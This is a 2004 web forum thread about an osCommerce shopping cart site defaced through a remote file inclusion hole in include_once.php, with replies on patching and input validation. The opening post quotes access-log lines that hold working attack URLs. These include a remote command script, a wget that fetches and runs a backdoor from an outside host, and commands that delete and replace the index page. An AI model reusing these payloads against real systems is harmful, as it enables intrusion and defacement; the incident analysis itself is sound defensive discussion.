PHP Site Hacked - 'Ir4dex Ownz you'

protoactive

A large shopping cart site we made was hacked on friday and the message "Ir4dex Ownz you" was put up. The hackers seemed to have exploited PHP by including a script of their own that somehow allows shell-like access using the address bar.

I investigated the access logs and found these entries which exploit PHP to allow for a virtual shell access:

200.217.114.221 - - [22/May/2004:20:13:16 -0500] "GET /catalog/includes/include_once.php?include_file=http://www.maedoadonai.hpg.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://portaldotiao.8bit.co.uk/backdoor/cgi;cd%20/tmp;chmod%204777%20cgi;cd%20/tmp;./cgi

200.217.114.221 - - [22/May/2004:20:16:34 -0500] "GET /catalog/includes/include_once.php?include_file=http://www.maedoadonai.hpg.com.br/cmd.txt?&cmd=cd%20/home/levinej/public_html;rm%20index.html;cd%20/home/levinej/public_html;echo%20Ir4dex%20ownz%20you%20>%20index.txt;cd%20/home/levinej/public_html;mv%20index.txt%20index.html

That entry along with previous one's make permanent changes to the server uses the script it calls from their website -- which is parsed by my website using the include. In that one statement they do an a RM a MV and an echo -- literally erasing my index file and replacing it with their message. In ones preceding it they do chmods, literally making readable everyfile on the public_html directory.

I fussed around with their script (http://www.maedoadonai.hpg.com.br/cmd.txt) and was able to duplicate their command sends, performing an LS and seeing the directories. My jaw dropped -- you don't even need the server password evidently with their app 'CMD - System Comand'?!

I also googled the phrase ""Ir4dex Ownz you" and discovered these guys are popular.

I'm hesitant to put the site back up thinking they might exploit it further consdering it is a shoping cart site with a confidential dbase.

Any suggestions, comments, etc? I don't know how to proceed.

Thanks.

bubblenut

Do you have any files which are including files provided by the url or by post? If these are not checked it can be a powefull way in. It sounds like it's time to thoroughly check through all your scripts and make sure you have appropriate levels of validation on all remotely provided data, this includes; GET, POST, HTTP headers & COOKIES.

Have you tried contacting the address, it the fact that they tend to leave one suggests they're doing it as a kind of hard-core wake up call. They may well point out the security holes which allowed them in.

HTH and good luck
Bubble

protoactive

We nipped it in the bud. The site uses OsCommerce previously known as The Exchange Project and we had not patched the include_once.php file.

From their site:

The Exchange Project Preview Release 2.1 [released March 2001] contains a security issue which can be taken advantage of by using the global variable scope that PHP provides.

The security issue concerns the following files:

catalog/includes/include_once.php
admin/includes/include_once.php

The cause of the security issue is the $include_file variable.

If either of the pages are requested directly through a client, the $include_file variable does not get initialized in the local variable scope; because of PHPs global variable scope PHP then automatically checks if $include_file has been set in the GET/POST/COOKIE variable scope.

http://www.oscommerce.com/about/news,72

You were basically right, It was a hardcore wake up call.

piersk

I don't know if you have the IP address, but I suggest that you contact your local authorities (police over here in the UK and the FBI in the states).

We at work had one of our FTP servers hacked and quite a lot of confidential documents were deleted (not as bad as if they had been downloaded thank the lord) but we contacted the police over here with the IP of the culprit and he is now awaiting trial.

That all may sound a little extreme, but I know it's one less skriptk1ddi3 in the world 🙂

onion2k

Pfft. If OS Commerce weren't open source that would never have happened...

😉

bastien

I didn't know windows was open source??? How many holes are in there??

OS or not, it doesn't make a difference. It depends on how securely you code. Purpose built applications that are purchased third party may contain holes that develop as the standards change.

If the poster had either checked the OsCommerce site for all updates (they are posted) or learned to adapt the code to the 'new' setting of 'register_globals' being off, it would have likely prevented the exploit.

It also depends on the people maintaining the server to keep up with patches and new releases

BuzzLY

Yes, of course. It's his fault his server was violated. The crackers did nothing wrong. :rolleyes: 😃

bubblenut

Originally posted by BuzzLY
It's his fault his server was violated.

Well, in part, yes. Making your server secure is your responsibility. By this I don't mean that the cracker is not in the wrong.

protoactive

If the poster had either checked the OsCommerce site for all updates (they are posted) or learned to adapt the code to the 'new' setting of 'register_globals' being off, it would have likely prevented the exploit.

I agree, as a web designer you are responsible for a site you created especially if it gets compromised by defacers. We acted quickly getting to the core of the problem by analyzing log data, tracing the IP, and finally determining that OS Commerces include_once.php file was outdated and the culprit for this php injection technique. Had we simply uploaded a backup and left the hole open perhaps there wouldn't be a next time. The site was built years ago. Periodically updating it with patches was also beyond the scope of the contract. When the hackers come though town though, then it's a question of the other clients on the servers getting compromised. Old site or new site, it doesn't matter at that point -- fix it.